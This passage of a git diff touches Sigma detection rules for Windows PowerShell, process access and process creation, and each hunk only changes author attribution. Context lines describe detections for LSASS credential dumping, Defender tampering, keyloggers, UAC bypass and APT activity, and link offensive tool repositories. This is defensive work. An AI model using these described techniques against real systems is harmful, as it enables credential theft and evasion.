b/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml @@ -5,7 +5,7 @@ related: type: derived status: experimental description: Detects suspicious PowerShell download command -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/12/02 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml index fb9d2dcf9..fb6509023 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml @@ -5,7 +5,7 @@ description: Detects Commandlet that is used to export certificates from the loc references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/04/23 modified: 2023/01/24 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml index 4c462db62..e93321d51 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml @@ -5,7 +5,7 @@ description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE- references: - https://twitter.com/nas_bench/status/1537919885031772161 - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/21 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml index 418a10281..b36d2d4b3 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml @@ -4,7 +4,7 @@ status: test description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/04/23 modified: 2022/12/25 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml index c431c9f3c..72f108610 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml @@ -7,7 +7,7 @@ related: type: similar status: test description: Detects suspicious PowerShell invocation command parameters -author: Florian Roth (rule) +author: Florian Roth (Nextron Systems) date: 2017/03/12 modified: 2023/01/03 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml index a35ced0ba..8ab4eb08f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml @@ -9,7 +9,7 @@ related: type: similar status: experimental description: Detects suspicious PowerShell invocation command parameters -author: Florian Roth (rule), Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro date: 2017/03/05 modified: 2023/01/05 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml index d0796f6d0..785f036b6 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml @@ -7,7 +7,7 @@ references: - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content - https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content - https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/04 tags: - attack.collection diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml index 05a66e50b..9e7a60869 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml @@ -7,7 +7,7 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1 - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1 - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7 -author: Florian Roth, Perez Diego (@darkquassar) +author: Florian Roth (Nextron Systems), Perez Diego (@darkquassar) date: 2019/02/11 modified: 2023/01/02 tags: diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml index f6bb2827d..6a34f746e 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml @@ -4,7 +4,7 @@ status: experimental description: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity references: - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/08 tags: - attack.command_and_control diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml index 64e36663e..97243d28e 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml @@ -5,7 +5,7 @@ related: type: similar status: experimental description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml index f9b1a61d4..0d1ef6fc3 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use references: - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/16 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml b/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml index f9d75a872..f8785f34e 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml @@ -7,7 +7,7 @@ status: experimental description: Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 tags: - attack.defense_evasion diff --git a/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml b/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml index f6f4b8e80..1146692ce 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml @@ -8,7 +8,7 @@ description: Detects usage of the Get-ADUser cmdlet to collect user information references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/17 tags: - attack.discovery diff --git a/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml b/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml index 37ab5b8ba..90d9858be 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml @@ -8,7 +8,7 @@ description: Detects usage of the "Set-Service" powershell cmdlet to configure a references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/17 tags: - attack.persistence diff --git a/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml b/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml index d53f5db28..0d94f34e4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml @@ -9,7 +9,7 @@ references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 modified: 2022/11/25 tags: diff --git a/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml index a7754713e..760f43606 100644 --- a/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml +++ b/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml @@ -5,7 +5,7 @@ description: Detects a typical pattern of a CobaltStrike BOF which inject into o references: - https://github.com/boku7/injectAmsiBypass - https://github.com/boku7/spawn -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/04 modified: 2022/12/31 tags: diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index de871759b..7fafb013e 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -7,7 +7,7 @@ references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) +author: Florian Roth (Nextron Systems), Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 modified: 2023/01/25 tags: diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index 2e17840a0..bb1b85e67 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF. references: - https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6 -author: Christian Burkard, Tim Shelton +author: Christian Burkard (Nextron Systems), Tim Shelton date: 2021/07/28 modified: 2022/12/28 tags: diff --git a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml index b09a8aeef..f268d97ec 100644 --- a/rules/windows/process_access/proc_access_win_hack_sysmonente.yml +++ b/rules/windows/process_access/proc_access_win_hack_sysmonente.yml @@ -6,7 +6,7 @@ references: - https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html - https://github.com/codewhitesec/SysmonEnte/ - https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/07 modified: 2022/09/09 tags: diff --git a/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml index 3b6b39d63..ce25dc9e2 100644 --- a/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml +++ b/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the process injection of a LittleCorporal generated Maldoc. references: - https://github.com/connormcgarr/LittleCorporal -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/09 modified: 2022/06/02 tags: diff --git a/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml b/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml index ad52ed634..b85b77acc 100644 --- a/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml +++ b/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz - https://twitter.com/mrd0x/status/1460597833917251595 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/10 tags: - attack.credential_access diff --git a/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml b/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml index 12d89efda..506d65e66 100644 --- a/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml +++ b/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml @@ -5,7 +5,7 @@ description: Detects a possible process memory dump based on a keyword in the fi references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/02/10 tags: - attack.credential_access diff --git a/rules/windows/process_access/proc_access_win_lsass_werfault.yml b/rules/windows/process_access/proc_access_win_lsass_werfault.yml index 50531ce34..1df422113 100644 --- a/rules/windows/process_access/proc_access_win_lsass_werfault.yml +++ b/rules/windows/process_access/proc_access_win_lsass_werfault.yml @@ -4,7 +4,7 @@ status: test description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up. references: - https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2012/06/27 modified: 2022/10/09 tags: diff --git a/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml b/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml index c53dedfbb..c316dcd43 100755 --- a/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml +++ b/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml @@ -4,7 +4,7 @@ status: test description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro references: - https://twitter.com/JohnLaTwC/status/837743453039534080 -author: John Lambert (tech), Florian Roth (rule) +author: John Lambert (tech), Florian Roth (Nextron Systems) date: 2017/03/04 modified: 2021/11/27 tags: diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 34222f47e..7a3b4a4f0 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -11,7 +11,7 @@ references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/13 modified: 2022/11/13 tags: diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml index c6fe87bfa..e538d39f2 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml @@ -11,7 +11,7 @@ references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/22 modified: 2022/06/20 tags: diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index 50434474b..cd9ab4ea6 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -8,7 +8,7 @@ references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/11/27 modified: 2022/11/01 tags: diff --git a/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml b/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml index fa666748b..4f845f93f 100644 --- a/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml +++ b/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml b/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml index 69cd97c42..b1c4006e6 100644 --- a/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_aadinternals_cmdlets_execution.yml @@ -8,7 +8,7 @@ description: Detects ADDInternals Cmdlet execution. A tool for administering Azu references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals -author: Austin Songer (@austinsonger), Nasreddine Bencherchali (update) +author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) date: 2022/12/23 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml b/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml index 04e0b5270..6b435484e 100644 --- a/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml +++ b/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the use of Advanced Port Scanner. references: - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2021/12/18 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml b/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml index b399660e6..e18c1fabd 100644 --- a/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml +++ b/rules/windows/process_creation/proc_creation_win_anydesk_execution_from_susp_folders.yml @@ -10,7 +10,7 @@ description: | Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/20 modified: 2023/01/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml b/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml index b0a91ee8f..50106f67c 100644 --- a/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml @@ -4,7 +4,7 @@ status: experimental description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. references: - https://redcanary.com/blog/misbehaving-rats/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/28 modified: 2023/01/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml b/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml index 2e55176bb..93f7c1e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml @@ -5,7 +5,7 @@ description: This method detects a suspicious PowerShell command line combinatio references: - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/12/04 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml b/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml index 0346e0818..725919284 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml @@ -4,7 +4,7 @@ status: test description: Detects activity that could be related to Baby Shark malware references: - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/24 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml b/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml index dfd847bc0..844017b1a 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml @@ -4,7 +4,7 @@ status: test description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike references: - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/21 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml b/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml index 0e1683007..d025705a3 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml @@ -4,7 +4,7 @@ status: test description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report references: - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software -author: Florian Roth, Tim Shelton +author: Florian Roth (Nextron Systems), Tim Shelton date: 2019/10/02 modified: 2022/07/05 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml b/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml index 93e12faeb..9e8165e95 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml @@ -7,7 +7,7 @@ status: test description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ -author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2021/09/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml index 071337656..cf74fc090 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml @@ -4,7 +4,7 @@ status: test description: Detects wmiexec vbs version execution by wscript or cscript references: - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/04/07 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_elise.yml b/rules/windows/process_creation/proc_creation_win_apt_elise.yml index 40d746b10..0a682a959 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_elise.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_elise.yml @@ -4,7 +4,7 @@ status: test description: Detects Elise backdoor acitivty as used by APT32 references: - https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/01/31 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml b/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml index 2b131ad30..aa186427d 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml @@ -5,7 +5,7 @@ description: Detects the execution of DLL side-loading malware used by threat gr references: - https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965 - https://twitter.com/cyb3rops/status/1168863899531132929 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/09/03 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml b/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml index b22e22554..3ef5e3963 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml @@ -6,7 +6,7 @@ references: - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= - https://securelist.com/apt-slingshot/84312/ - https://twitter.com/cyb3rops/status/972186477512839170 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/03/04 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml b/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml index 375426f9e..2b505de59 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml @@ -5,7 +5,7 @@ description: Detects Golden Chickens deployment method as used by Evilnum in rep references: - https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/10 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml b/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml index 2e78e6e83..388f6d11e 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml @@ -4,7 +4,7 @@ status: test description: Detects tools and process executions as observed in a Greenbug campaign in May 2020 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/20 modified: 2021/09/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml b/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml index 4b944e144..d4ce880c0 